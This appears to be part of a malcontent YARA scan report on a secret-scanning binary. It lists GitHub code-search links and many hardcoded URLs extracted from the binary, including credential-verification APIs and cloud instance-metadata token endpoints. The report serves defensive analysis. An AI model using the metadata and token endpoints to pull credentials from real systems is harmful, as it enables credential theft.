[randomize_seed](https://github.com/search?q=randomize_seed&type=code)
[readTimeRandom](https://github.com/search?q=readTimeRandom&type=code)
[Random_Number](https://github.com/search?q=Random_Number&type=code)
[SetRandomSeed](https://github.com/search?q=SetRandomSeed&type=code)
[randomization](https://github.com/search?q=randomization&type=code)
[tabularrandom](https://github.com/search?q=tabularrandom&type=code)
[KernelRandom](https://github.com/search?q=KernelRandom&type=code)
[random_score](https://github.com/search?q=random_score&type=code)
[random_token](https://github.com/search?q=random_token&type=code)
[Random_Seed](https://github.com/search?q=Random_Seed&type=code)
[randomCbUID](https://github.com/search?q=randomCbUID&type=code)
[randomGetFn](https://github.com/search?q=randomGetFn&type=code)
[randomOrder](https://github.com/search?q=randomOrder&type=code)
[randomPoint](https://github.com/search?q=randomPoint&type=code)
[TakeRandom](https://github.com/search?q=TakeRandom&type=code)
[nextRandom](https://github.com/search?q=nextRandom&type=code)
[randomEnum](https://github.com/search?q=randomEnum&type=code)
[randomSeed](https://github.com/search?q=randomSeed&type=code)
[randomized](https://github.com/search?q=randomized&type=code)
[randomseed](https://github.com/search?q=randomseed&type=code)
[slotrandom](https://github.com/search?q=slotrandom&type=code)
[RandomKey](https://github.com/search?q=RandomKey&type=code)
[getRandom](https://github.com/search?q=getRandom&type=code)
[RandomID](https://github.com/search?q=RandomID&type=code)
[srandom](https://github.com/search?q=srandom&type=code)
[urandom](https://github.com/search?q=urandom&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://localhost/deprecated_featureconnection_failureprotocol_violationindicator_overflowrestrict_violationnot_null_violationcollation_mismatchundefined_functionduplicate_databaseduplicate_functionam](https://localhost/deprecated_featureconnection_failureprotocol_violationindicator_overflowrestrict_violationnot_null_violationcollation_mismatchundefined_functionduplicate_databaseduplicate_functionam)
[https://api.openai.com/v1/assistantsmail_settings.address_whitelist.readuser.multifactor_authentication.readadmin.conversations.convertToPrivateadmin.conversations.disconnectSharedadmin](https://api.openai.com/v1/assistantsmail_settings.address_whitelist.readuser.multifactor_authentication.readadmin.conversations.convertToPrivateadmin.conversations.disconnectSharedadmin)
[https://api.mailgun.net/v4/domainstracking_settings.google_analyticsmail_settings.plain_content.updatetemplates.versions.activate.createtemplates.versions.activate.deletetemplates](https://api.mailgun.net/v4/domainstracking_settings.google_analyticsmail_settings.plain_content.updatetemplates.versions.activate.createtemplates.versions.activate.deletetemplates)
[https://api.getpostman.com/meaccess_settings.activity.readmail_settings.template.updatesuppression.spam_reports.readsuppression.unsubscribes.readtracking_settings.open.updateuser](https://api.getpostman.com/meaccess_settings.activity.readmail_settings.template.updatesuppression.spam_reports.readsuppression.unsubscribes.readtracking_settings.open.updateuser)
[https://go.postman.co/workspaces/mail_settings.bounce_purge.updatemail_settings.forward_bounce.readmail_settings.forward_spam.updatepartner_settings.new_relic.updatesubusers](https://go.postman.co/workspaces/mail_settings.bounce_purge.updatemail_settings.forward_bounce.readmail_settings.forward_spam.updatepartner_settings.new_relic.updatesubusers)
[https://api.openai.com/v1/filesmail_settings.address_whitelistuser.multifactor_authenticationmail_settings.bounce_purge.readmail_settings.forward_spam.readpartner_settings](https://api.openai.com/v1/filesmail_settings.address_whitelistuser.multifactor_authenticationmail_settings.bounce_purge.readmail_settings.forward_spam.readpartner_settings)
[https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.netpostgres.database.chinacloudapi.cnhttps](https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.netpostgres.database.chinacloudapi.cnhttps)
[https://oauth2.mtls.googleapis.com/tokengrpc.io/server/received_messages_per_rpcgrpc.io/client/received_messages_per_rpcgrpclb](https://oauth2.mtls.googleapis.com/tokengrpc.io/server/received_messages_per_rpcgrpc.io/client/received_messages_per_rpcgrpclb)
[https://api.getpostman.com/workspacestracking_settings.subscription.updateworkflows.triggers.permissions.removehttps](https://api.getpostman.com/workspacestracking_settings.subscription.updateworkflows.triggers.permissions.removehttps)
[https://howtorotate.com/docs/tutorials/microsoftteams/.myfreshworks.com/crm/sales/api/sales_accounts/filtershttps](https://howtorotate.com/docs/tutorials/microsoftteams/.myfreshworks.com/crm/sales/api/sales_accounts/filtershttps)
[https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUSGOVERNMENTCLOUDAZURE_GO_SDK_LOG_LEVELnot](https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUSGOVERNMENTCLOUDAZURE_GO_SDK_LOG_LEVELnot)
[https://github.com/pygments/pygments/blob/15f222adefd2bf7835bfd74a12d720028ae68d29/pygments/lexers/dalvik.py.](https://github.com/pygments/pygments/blob/15f222adefd2bf7835bfd74a12d720028ae68d29/pygments/lexers/dalvik.py.)
[https://iamcredentials.mtls.googleapis.com/buffered_file_writer_total_write_size_byteshash/adler32](https://iamcredentials.mtls.googleapis.com/buffered_file_writer_total_write_size_byteshash/adler32)
[https://batch.cloudapi.de/mysql.database.cloudapi.decloudapp.microsoftazure.denegative](https://batch.cloudapi.de/mysql.database.cloudapi.decloudapp.microsoftazure.denegative)
[https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/LA](https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/LA)
[https://api.simplynoted.com/api/productsfakeTruffleHogAccessTokenForVerificationhttps](https://api.simplynoted.com/api/productsfakeTruffleHogAccessTokenForVerificationhttps)
[https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_record_summaries](https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_record_summaries)
[https://api.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoftazure.denot](https://api.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoftazure.denot)
[https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudapi.nethttps](https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudapi.nethttps)
[https://api.airbrake.io/api/v4/projects/grant_type=client_credentials&client_id=ht](https://api.airbrake.io/api/v4/projects/grant_type=client_credentials&client_id=ht)
[https://app.caflou.com/api/v1/accounts.currencycloud.com/v2/authenticate/apihttps](https://app.caflou.com/api/v1/accounts.currencycloud.com/v2/authenticate/apihttps)
[https://howtorotate.com/docs/tutorials/netlify//services/rest/record/v1/metadata](https://howtorotate.com/docs/tutorials/netlify//services/rest/record/v1/metadata)
[https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_records](https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_records)
[https://api.stripe.com/v1/billing/meters/nowaythiscanexist/event_summaries](https://api.stripe.com/v1/billing/meters/nowaythiscanexist/event_summaries)
[https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps](https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps)
[https://statuspal.io/api/v1/status_pages/secretscanner/subscriptionshttps](https://statuspal.io/api/v1/status_pages/secretscanner/subscriptionshttps)
[https://api.telnyx.com/v2/messaging_profilesapplication/vnd.tickettailor](https://api.telnyx.com/v2/messaging_profilesapplication/vnd.tickettailor)
[https://docs.stripe.com/api/usage_records/subscription_item_summary_list](https://docs.stripe.com/api/usage_records/subscription_item_summary_list)
[https://api.stripe.com/v1/tax/calculations/nowaycanthisexist/line_items](https://api.stripe.com/v1/tax/calculations/nowaycanthisexist/line_items)
[https://gallery.chinacloudapi.cn/mariadb.database.chinacloudapi.cnhttps](https://gallery.chinacloudapi.cn/mariadb.database.chinacloudapi.cnhttps)
[https://anypoint.mulesoft.com/apiplatform/repository/v2/organizations/](https://anypoint.mulesoft.com/apiplatform/repository/v2/organizations/)
[https://api.flightstats.com/flex/aircraft/rest/v1/json/availableFields](https://api.flightstats.com/flex/aircraft/rest/v1/json/availableFields)
[https://app.snipcart.com/api/ordersgrant_type=refresh_token&client_id=](https://app.snipcart.com/api/ordersgrant_type=refresh_token&client_id=)
[https://cloud.viewneo.com/api/v1.0/playlistapplication/vnd.zipcodebase](https://cloud.viewneo.com/api/v1.0/playlistapplication/vnd.zipcodebase)
[https://developer.api.autodesk.com/authentication/v1/authenticateimage](https://developer.api.autodesk.com/authentication/v1/authenticateimage)
[https://api.apifonica.com/v2/accounts&my=true&offset=10&limit=99&desc](https://api.apifonica.com/v2/accounts&my=true&offset=10&limit=99&desc)
[https://hub.docker.com/v2/users/loginapplication/vnd.dyspatch.2020.11](https://hub.docker.com/v2/users/loginapplication/vnd.dyspatch.2020.11)
[https://api.stripe.com/v1/application_fees/nowaythiscanexist/refunds](https://api.stripe.com/v1/application_fees/nowaythiscanexist/refunds)
[https://dataservice.accuweather.com/locations/v1/cities/autocomplete](https://dataservice.accuweather.com/locations/v1/cities/autocomplete)
[https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp](https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp)
[https://api.stripe.com/v1/terminal/configurations/nowaythiscanexist](https://api.stripe.com/v1/terminal/configurations/nowaythiscanexist)
[https://batch.chinacloudapi.cn/mysql.database.chinacloudapi.cnhttps](https://batch.chinacloudapi.cn/mysql.database.chinacloudapi.cnhttps)
[https://api.eu.newrelic.com/v2/users.jsonapplication/vnd.onesignal](https://api.eu.newrelic.com/v2/users.jsonapplication/vnd.onesignal)
[https://api.rocketreach.co/v2/api/accountapplication/vnd.semaphore](https://api.rocketreach.co/v2/api/accountapplication/vnd.semaphore)
[https://api.stripe.com/v1/issuing/authorizations/nowaythiscanexist](https://api.stripe.com/v1/issuing/authorizations/nowaythiscanexist)
[https://trufflesecurity.com/canariesDefaultEndpointsProtocol=https](https://trufflesecurity.com/canariesDefaultEndpointsProtocol=https)
[https://api.overloop.com/public/v1/usersapplication/vnd.pagerduty](https://api.overloop.com/public/v1/usersapplication/vnd.pagerduty)
[https://api.uclassify.com/v1/uClassify/Sentiment/classifyReceived](https://api.uclassify.com/v1/uClassify/Sentiment/classifyReceived)
[https://docs.stripe.com/api/identity/verification_sessions/create](https://docs.stripe.com/api/identity/verification_sessions/create)
[https://www.meistertask.com/api/projectsapplication/vnd.moonclerk](https://www.meistertask.com/api/projectsapplication/vnd.moonclerk)
[http://169.254.169.254/latestProcessProviderExecutionErrorfailed](http://169.254.169.254/latestProcessProviderExecutionErrorfailed)
[https://api.delighted.com/v1/people.jsonapplication/vnd.docusign](https://api.delighted.com/v1/people.jsonapplication/vnd.docusign)
[https://api.kraken.com/0/private/Balanceapplication/vnd.loadmill](https://api.kraken.com/0/private/Balanceapplication/vnd.loadmill)
[https://api.stormboard.com/users/profileapplication/vnd.timecamp](https://api.stormboard.com/users/profileapplication/vnd.timecamp)
[https://api.stripe.com/v1/issuing/transactions/nowaythiscanexist](https://api.stripe.com/v1/issuing/transactions/nowaythiscanexist)
[https://backboard.railway.app/graphql/v2application/vnd.sugester](https://backboard.railway.app/graphql/v2application/vnd.sugester)
[https://manage.windowsazure.us/publishsettings/indexunrecognized](https://manage.windowsazure.us/publishsettings/indexunrecognized)
[https://mltb8350.hiveage.com/api/networkapplication/vnd.hybiscus](https://mltb8350.hiveage.com/api/networkapplication/vnd.hybiscus)
[https://platform.devtest.ringcentral.com/restapi/oauth/authorize](https://platform.devtest.ringcentral.com/restapi/oauth/authorize)
[https://www.googleapis.com/auth/devstorage.read_writecredentials](https://www.googleapis.com/auth/devstorage.read_writecredentials)
[https://api.stripe.com/v1/confirmation_tokens/nowaythiscanexist](https://api.stripe.com/v1/confirmation_tokens/nowaythiscanexist)
[https://api.stripe.com/v1/issuing/cardholders/nowaythiscanexist](https://api.stripe.com/v1/issuing/cardholders/nowaythiscanexist)
[https://database.windows.net/postgres.database.cloudapi.dehttps](https://database.windows.net/postgres.database.cloudapi.dehttps)
[https://docs.stripe.com/api/identity/verification_sessions/list](https://docs.stripe.com/api/identity/verification_sessions/list)
[https://docs.stripe.com/api/issuing/funding_instructions/create](https://docs.stripe.com/api/issuing/funding_instructions/create)
[https://api.stytch.com/v1/users/pendingapplication/vnd.tatumio](https://api.stytch.com/v1/users/pendingapplication/vnd.tatumio)
[https://api.twitter.com/oauth2/tokenapplication/vnd.uploadcare](https://api.twitter.com/oauth2/tokenapplication/vnd.uploadcare)
[https://app.magnetichq.com/Magnetic/rest/accountsAPI/itemTypes](https://app.magnetichq.com/Magnetic/rest/accountsAPI/itemTypes)
[https://docs.stripe.com/api/payment_links/payment_links/create](https://docs.stripe.com/api/payment_links/payment_links/create)
[https://gallery.cloudapi.de/mariadb.database.cloudapi.defailed](https://gallery.cloudapi.de/mariadb.database.cloudapi.defailed)
[https://www.googleapis.com/auth/devstorage.full_controlstorage](https://www.googleapis.com/auth/devstorage.full_controlstorage)
[https://api.stripe.com/v1/tax/registrations/nowaycanthisexist](https://api.stripe.com/v1/tax/registrations/nowaycanthisexist)
[https://apiv2.bitcoinaverage.com/websocket/v3/get_tickethttps](https://apiv2.bitcoinaverage.com/websocket/v3/get_tickethttps)
[https://coveralls.io/api/repos/github/secretscanner02/scanner](https://coveralls.io/api/repos/github/secretscanner02/scanner)
[https://dictionary.yandex.net/api/v1/dicservice.json/getLangs](https://dictionary.yandex.net/api/v1/dicservice.json/getLangs)
[https://docs.stripe.com/api/issuing/funding_instructions/list](https://docs.stripe.com/api/issuing/funding_instructions/list)
[https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps](https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps)
[https://www.googleapis.com/auth/devstorage.read_onlywildcards](https://www.googleapis.com/auth/devstorage.read_onlywildcards)
[https://api.optimizely.com/v2/projectsapplication/vnd.planyo](https://api.optimizely.com/v2/projectsapplication/vnd.planyo)
[https://api.stripe.com/v1/issuing/disputes/nowaythiscanexist](https://api.stripe.com/v1/issuing/disputes/nowaythiscanexist)
[https://docs.stripe.com/api/payment_links/payment_links/list](https://docs.stripe.com/api/payment_links/payment_links/list)
[https://api.apilayer.com/number_verification/countrieshttps](https://api.apilayer.com/number_verification/countrieshttps)
[https://api.storecove.com/api/v2/discovery/identifiershttps](https://api.storecove.com/api/v2/discovery/identifiershttps)
[https://api.stripe.com/v1/payment_methods/nowaycanthisexist](https://api.stripe.com/v1/payment_methods/nowaycanthisexist)
[https://api.stripe.com/v1/reviews/nowaycanthisexist/approve](https://api.stripe.com/v1/reviews/nowaycanthisexist/approve)
[https://api.tiingo.com/tiingo/fundamentals/definitionshttps](https://api.tiingo.com/tiingo/fundamentals/definitionshttps)
[https://budibase.app/api/public/v1/applications/searchhttps](https://budibase.app/api/public/v1/applications/searchhttps)
[https://docs.stripe.com/api/confirmation_tokens/test_create](https://docs.stripe.com/api/confirmation_tokens/test_create)
[https://docs.stripe.com/api/customer_portal/sessions/create](https://docs.stripe.com/api/customer_portal/sessions/create)
[https://docs.stripe.com/api/issuing/authorizations/retrieve](https://docs.stripe.com/api/issuing/authorizations/retrieve)
[https://industrial.api.ubidots.com/api/v1.6/variables/https](https://industrial.api.ubidots.com/api/v1.6/variables/https)
[https://manage.chinacloudapi.com/publishsettings/indexhttps](https://manage.chinacloudapi.com/publishsettings/indexhttps)
[https://services.reachmail.net/administration/users/current](https://services.reachmail.net/administration/users/current)
[http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2](http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2)
[https://api.ngrok.com/agent_ingressesapplication/vnd.nylas](https://api.ngrok.com/agent_ingressesapplication/vnd.nylas)
[https://api.rs2.usw2.rockset.com/v1/orgs/self/querieshttps](https://api.rs2.usw2.rockset.com/v1/orgs/self/querieshttps)
[https://api.sandbox.signaturit.com/v3/signatures.jsonhttps](https://api.sandbox.signaturit.com/v3/signatures.jsonhttps)
[https://api.stripe.com/v1/issuing/tokens/nowaythiscanexist](https://api.stripe.com/v1/issuing/tokens/nowaythiscanexist)
[https://api.stripe.com/v1/test_helpers/confirmation_tokens](https://api.stripe.com/v1/test_helpers/confirmation_tokens)
[https://example.teamwork.com/desk/api/v2/me.jsonRepository](https://example.teamwork.com/desk/api/v2/me.jsonRepository)
[https://example.teamwork.com/spaces/api/v1/users.jsonhttps](https://example.teamwork.com/spaces/api/v1/users.jsonhttps)
[https://gen.duply.co/v1/usagegrant_type=client_credentials](https://gen.duply.co/v1/usagegrant_type=client_credentials)
[https://login.eagleeyenetworks.com/g/aaa/authenticatehttps](https://login.eagleeyenetworks.com/g/aaa/authenticatehttps)
[https://manage.microsoftazure.de/publishsettings/indexhttp](https://manage.microsoftazure.de/publishsettings/indexhttp)
[https://pastebin.com/api/api_post.phpapplication/vnd.percy](https://pastebin.com/api/api_post.phpapplication/vnd.percy)
[https://test.api.amadeus.com/v1/security/oauth2/tokenhttps](https://test.api.amadeus.com/v1/security/oauth2/tokenhttps)
[http://schemas.microsoft.com/3dmanufacturing/core/2015/02](http://schemas.microsoft.com/3dmanufacturing/core/2015/02)
[https://api.copper.com/developer_api/v1/tasks/searchhttps](https://api.copper.com/developer_api/v1/tasks/searchhttps)
[https://api.stripe.com/v1/billing/meter_event_adjustments](https://api.stripe.com/v1/billing/meter_event_adjustments)
[https://api.stripe.com/v1/issuing/cards/nowaythiscanexist](https://api.stripe.com/v1/issuing/cards/nowaythiscanexist)
[https://api.stripe.com/v1/setup_intents/nowaycanthisexist](https://api.stripe.com/v1/setup_intents/nowaycanthisexist)
[https://api.worldweatheronline.com/premium/v1/search.ashx](https://api.worldweatheronline.com/premium/v1/search.ashx)
[https://cloud.google.com/docs/authentication/external/set](https://cloud.google.com/docs/authentication/external/set)
[https://docs.stripe.com/api/issuing/authorizations/update](https://docs.stripe.com/api/issuing/authorizations/update)
[https://docs.stripe.com/api/issuing/transactions/retrieve](https://docs.stripe.com/api/issuing/transactions/retrieve)
[https://docs.stripe.com/api/payment_method_domains/create](https://docs.stripe.com/api/payment_method_domains/create)
[https://docs.stripe.com/api/terminal/configuration/update](https://docs.stripe.com/api/terminal/configuration/update)
[https://geoip.maxmind.com/geoip/v2.1/country/8.8.8.8https](https://geoip.maxmind.com/geoip/v2.1/country/8.8.8.8https)
[https://graph.windows.net/mariadb.database.azure.comhttps](https://graph.windows.net/mariadb.database.azure.comhttps)
[https://moderationapi.com/api/v1/analyze/languagePostgres](https://moderationapi.com/api/v1/analyze/languagePostgres)
[https://api.avaza.com/api/Account.blob.core.windows.net/](https://api.avaza.com/api/Account.blob.core.windows.net/)
[https://api.cloudmersive.com/validate/address/parsehttps](https://api.cloudmersive.com/validate/address/parsehttps)
[https://api.ecostruxureit.com/rest/v1/organizationshttps](https://api.ecostruxureit.com/rest/v1/organizationshttps)
[https://api.rechargeapps.com/token_information&url=https](https://api.rechargeapps.com/token_information&url=https)
[https://api.stripe.com/v1/credit_notes/nowaythiscanexsit](https://api.stripe.com/v1/credit_notes/nowaythiscanexsit)
[https://api.stripe.com/v1/identity/verification_sessions](https://api.stripe.com/v1/identity/verification_sessions)
[https://api.thinkific.com/api/public/v1/collectionshttps](https://api.thinkific.com/api/public/v1/collectionshttps)
[https://api.twist.com/api/v3/users/get_session_userhttps](https://api.twist.com/api/v3/users/get_session_userhttps)
[https://cicero.azavea.com/v3.1/account/credits_remaining](https://cicero.azavea.com/v3.1/account/credits_remaining)
[https://docs.stripe.com/api/confirmation_tokens/retrieve](https://docs.stripe.com/api/confirmation_tokens/retrieve)
[https://docs.stripe.com/api/issuing/cardholders/retrieve](https://docs.stripe.com/api/issuing/cardholders/retrieve)
[https://howtorotate.com/docs/tutorials/sourcegraph/https](https://howtorotate.com/docs/tutorials/sourcegraph/https)
[https://manage.windowsazure.com/publishsettings/indexraw](https://manage.windowsazure.com/publishsettings/indexraw)
[https://track.customer.io/api/v1/customers/5/eventshttps](https://track.customer.io/api/v1/customers/5/eventshttps)
[https://api.cloudflare.com/client/v4/user/tokens/verify](https://api.cloudflare.com/client/v4/user/tokens/verify)
[https://api.elasticemail.com/v2/account/profileoverview](https://api.elasticemail.com/v2/account/profileoverview)
[https://api.magicbell.com/notification_preferenceshttps](https://api.magicbell.com/notification_preferenceshttps)
[https://app.vagrantup.com/api/v2/authenticateunexpected](https://app.vagrantup.com/api/v2/authenticateunexpected)
[https://docs.stripe.com/api/issuing/transactions/update](https://docs.stripe.com/api/issuing/transactions/update)
[https://docs.stripe.com/api/payment_method_domains/list](https://docs.stripe.com/api/payment_method_domains/list)
[https://docs.stripe.com/api/tax/calculations/line_items](https://docs.stripe.com/api/tax/calculations/line_items)
[https://docs.stripe.com/api/terminal/configuration/list](https://docs.stripe.com/api/terminal/configuration/list)
[https://example.teamwork.com/crm/api/v2/users.jsonhttps](https://example.teamwork.com/crm/api/v2/users.jsonhttps)
[https://formio.form.io/currentapplication/vnd.github.v3](https://formio.form.io/currentapplication/vnd.github.v3)
[https://howtorotate.com/docs/tutorials/elevenlabs/https](https://howtorotate.com/docs/tutorials/elevenlabs/https)
[https://howtorotate.com/docs/tutorials/railwayapp/https](https://howtorotate.com/docs/tutorials/railwayapp/https)
[https://microsoftgraph.chinacloudapi.cn/server_duration](https://microsoftgraph.chinacloudapi.cn/server_duration)
[https://platform.segmentapis.com/v1beta/workspaceshttps](https://platform.segmentapis.com/v1beta/workspaceshttps)
[https://api.blocknative.com/gasprices/blockpriceshttps](https://api.blocknative.com/gasprices/blockpriceshttps)
[https://api.dropboxapi.com/2/users/get_current_account](https://api.dropboxapi.com/2/users/get_current_account)
[https://api.postageapp.com/v.1.0/get_account_info.json](https://api.postageapp.com/v.1.0/get_account_info.json)
[https://api.stripe.com/v1/issuing/funding_instructions](https://api.stripe.com/v1/issuing/funding_instructions)
[https://api.textanywhere.com/API/v1.0/REST/statushttps](https://api.textanywhere.com/API/v1.0/REST/statushttps)
[https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png](https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png)
[https://connect.squareupsandbox.com/oauth2/revokehttps](https://connect.squareupsandbox.com/oauth2/revokehttps)
[https://console.jumpcloud.com/api/v2/systemgroupshttps](https://console.jumpcloud.com/api/v2/systemgroupshttps)
[https://docs.stripe.com/api/issuing/cardholders/create](https://docs.stripe.com/api/issuing/cardholders/create)
[https://howtorotate.com/docs/tutorials/atlassian/https](https://howtorotate.com/docs/tutorials/atlassian/https)
[https://howtorotate.com/docs/tutorials/mailchimp/https](https://howtorotate.com/docs/tutorials/mailchimp/https)
[https://howtorotate.com/docs/tutorials/sumologic/https](https://howtorotate.com/docs/tutorials/sumologic/https)
[https://pdflayer.com/downloads/invoice.htmlPlanetScale](https://pdflayer.com/downloads/invoice.htmlPlanetScale)
[https://storage.mtls.googleapis.com/storage/v1/storage](https://storage.mtls.googleapis.com/storage/v1/storage)
[https://weather.ls.hereapi.com/weather/1.0/report.json](https://weather.ls.hereapi.com/weather/1.0/report.json)
[https://www.googleapis.com/auth/devstorage.read_writeB](https://www.googleapis.com/auth/devstorage.read_writeB)
[https://www.happyscribe.com/api/v1/transcriptionshttps](https://www.happyscribe.com/api/v1/transcriptionshttps)
[https://www.mongodb.com/supportability/documentdbAzure](https://www.mongodb.com/supportability/documentdbAzure)
[https://www.protocols.io/api/v3/session/profilerequest](https://www.protocols.io/api/v3/session/profilerequest)
[http://169.254.169.254/metadata/identity/oauth2/token](http://169.254.169.254/metadata/identity/oauth2/token)
[https://api.centralstationcrm.net/api/users.jsonhttps](https://api.centralstationcrm.net/api/users.jsonhttps)
[https://api.mavenlink.com/api/v1/workspaces.jsonhttps](https://api.mavenlink.com/api/v1/workspaces.jsonhttps)
[https://api.parsers.dev/api/v1/parse/postgresql/https](https://api.parsers.dev/api/v1/parse/postgresql/https)
[https://api.partnerstack.com/api/v2/partnershipshttps](https://api.partnerstack.com/api/v2/partnershipshttps)
[https://api.stripe.com/v1/customers/nowaythiscanexist](https://api.stripe.com/v1/customers/nowaythiscanexist)
[https://app.onedesk.com/rest/2.0/login/loginUserhttps](https://app.onedesk.com/rest/2.0/login/loginUserhttps)
[https://app.ticketmaster.com/discovery/v2/events.json](https://app.ticketmaster.com/discovery/v2/events.json)
[https://connect.squareupsandbox.com/v2/merchantshttps](https://connect.squareupsandbox.com/v2/merchantshttps)
[https://docs.stripe.com/api/issuing/disputes/retrieve](https://docs.stripe.com/api/issuing/disputes/retrieve)
[https://docs.stripe.com/api/reporting/report_run/list](https://docs.stripe.com/api/reporting/report_run/list)
[https://docs.stripe.com/api/terminal/locations/create](https://docs.stripe.com/api/terminal/locations/create)
[https://gitlab.com/api/v4/personal_access_tokens/self](https://gitlab.com/api/v4/personal_access_tokens/self)
[https://howtorotate.com/docs/tutorials/airbrake/https](https://howtorotate.com/docs/tutorials/airbrake/https)
[https://howtorotate.com/docs/tutorials/sendbird/https](https://howtorotate.com/docs/tutorials/sendbird/https)
[https://howtorotate.com/docs/tutorials/sendgrid/https](https://howtorotate.com/docs/tutorials/sendgrid/https)
[https://trackapi.nutritionix.com/v2/natural/nutrients](https://trackapi.nutritionix.com/v2/natural/nutrients)
[https://vault.azure.net/mysql.database.azure.comhttps](https://vault.azure.net/mysql.database.azure.comhttps)
[https://www.carboninterface.com/api/v1/estimateshttps](https://www.carboninterface.com/api/v1/estimateshttps)
[https://www.googleapis.com/youtube/v3/channelSections](https://www.googleapis.com/youtube/v3/channelSections)
[https://api.api2cart.com/v1.1/account.cart.list.json](https://api.api2cart.com/v1.1/account.cart.list.json)
[https://api.developer.coinbase.com/waas/pools/protoc](https://api.developer.coinbase.com/waas/pools/protoc)
[https://api.glassnode.com/v1/metrics/indicators/sopr](https://api.glassnode.com/v1/metrics/indicators/sopr)
[https://api.instabot.io/v1spring.datasource.password](https://api.instabot.io/v1spring.datasource.password)
[https://api.openai.com/v1/modelsuser.scheduled_sends](https://api.openai.com/v1/modelsuser.scheduled_sends)
[https://api.stripe.com/v1/disputes/nowaycanthisexist](https://api.stripe.com/v1/disputes/nowaycanthisexist)
[https://api.teletype.app/public/api/v1/messageshttps](https://api.teletype.app/public/api/v1/messageshttps)
[https://app.terraform.io/api/v2/account/detailshttps](https://app.terraform.io/api/v2/account/detailshttps)
[https://connect.squareup.com/oauth2/token/statusx509](https://connect.squareup.com/oauth2/token/statusx509)
[https://docs.stripe.com/api/checkout/sessions/create](https://docs.stripe.com/api/checkout/sessions/create)
[https://docs.stripe.com/api/customer_sessions/create](https://docs.stripe.com/api/customer_sessions/create)
[https://docs.stripe.com/api/tax/registrations/update](https://docs.stripe.com/api/tax/registrations/update)
[https://docs.stripe.com/api/webhook_endpoints/create](https://docs.stripe.com/api/webhook_endpoints/create)
[https://gist.github.comMetaDataValidationErrorunable](https://gist.github.comMetaDataValidationErrorunable)
[https://howtorotate.com/docs/tutorials/maxmind/https](https://howtorotate.com/docs/tutorials/maxmind/https)
[https://rendyplayground.simvoly.com/api/site/members](https://rendyplayground.simvoly.com/api/site/members)
[https://www.browserstack.com/automate/plan.jsonhttps](https://www.browserstack.com/automate/plan.jsonhttps)
[http://metadata/computeMetadata/v1/instance/service](http://metadata/computeMetadata/v1/instance/service)
[https://api.skybiometry.com/fc/account/authenticate](https://api.skybiometry.com/fc/account/authenticate)
[https://api.stripe.com/v1/sources/nowaycanthisexist](https://api.stripe.com/v1/sources/nowaycanthisexist)
[https://apiv4.reallysimplesystems.com/accountshttps](https://apiv4.reallysimplesystems.com/accountshttps)
[https://docs.stripe.com/api/issuing/disputes/update](https://docs.stripe.com/api/issuing/disputes/update)
[https://docs.stripe.com/api/issuing/tokens/retrieve](https://docs.stripe.com/api/issuing/tokens/retrieve)
[https://docs.stripe.com/api/tax/calculations/create](https://docs.stripe.com/api/tax/calculations/create)
[https://docs.stripe.com/api/terminal/locations/list](https://docs.stripe.com/api/terminal/locations/list)
[https://docs.stripe.com/api/terminal/readers/create](https://docs.stripe.com/api/terminal/readers/create)
[https://github.com/login/oauth/access_tokenexpected](https://github.com/login/oauth/access_tokenexpected)
[https://howtorotate.com/docs/tutorials/eraser/https](https://howtorotate.com/docs/tutorials/eraser/https)
[https://howtorotate.com/docs/tutorials/github/https](https://howtorotate.com/docs/tutorials/github/https)
[https://howtorotate.com/docs/tutorials/gitlab/https](https://howtorotate.com/docs/tutorials/gitlab/https)
[https://howtorotate.com/docs/tutorials/square/https](https://howtorotate.com/docs/tutorials/square/https)
[https://howtorotate.com/docs/tutorials/stripe/https](https://howtorotate.com/docs/tutorials/stripe/https)
[https://keychecker.trufflesecurity.com/fingerprint/](https://keychecker.trufflesecurity.com/fingerprint/)
[https://nethunt.com/api/v1/zapier/triggers/readable](https://nethunt.com/api/v1/zapier/triggers/readable)
[https://owlbot.info/api/v4/dictionary/securityhttps](https://owlbot.info/api/v4/dictionary/securityhttps)
[https://transit.walkscore.com/transit/search/stops/](https://transit.walkscore.com/transit/search/stops/)
[https://uptime.betterstack.com/api/v2/monitorshttps](https://uptime.betterstack.com/api/v2/monitorshttps)
[https://www.googleapis.com/blogger/v3/blogs/2399953](https://www.googleapis.com/blogger/v3/blogs/2399953)
[https://amplitude.com/api/2/taxonomy/categoryhttps](https://amplitude.com/api/2/taxonomy/categoryhttps)
[https://api.appfollow.io/api/v2/account/usershttps](https://api.appfollow.io/api/v2/account/usershttps)
[https://api.developer.coinbase.com/waas/poolsquery](https://api.developer.coinbase.com/waas/poolsquery)
[https://api.edenai.run/v1/automl/text/projecthttps](https://api.edenai.run/v1/automl/text/projecthttps)
[https://api.loginradius.com/identity/v2/serverinfo](https://api.loginradius.com/identity/v2/serverinfo)
[https://api.shutterstock.com/v2/images/searchhttps](https://api.shutterstock.com/v2/images/searchhttps)
[https://api.stripe.com/v1/quotes/nowaythiscanexist](https://api.stripe.com/v1/quotes/nowaythiscanexist)
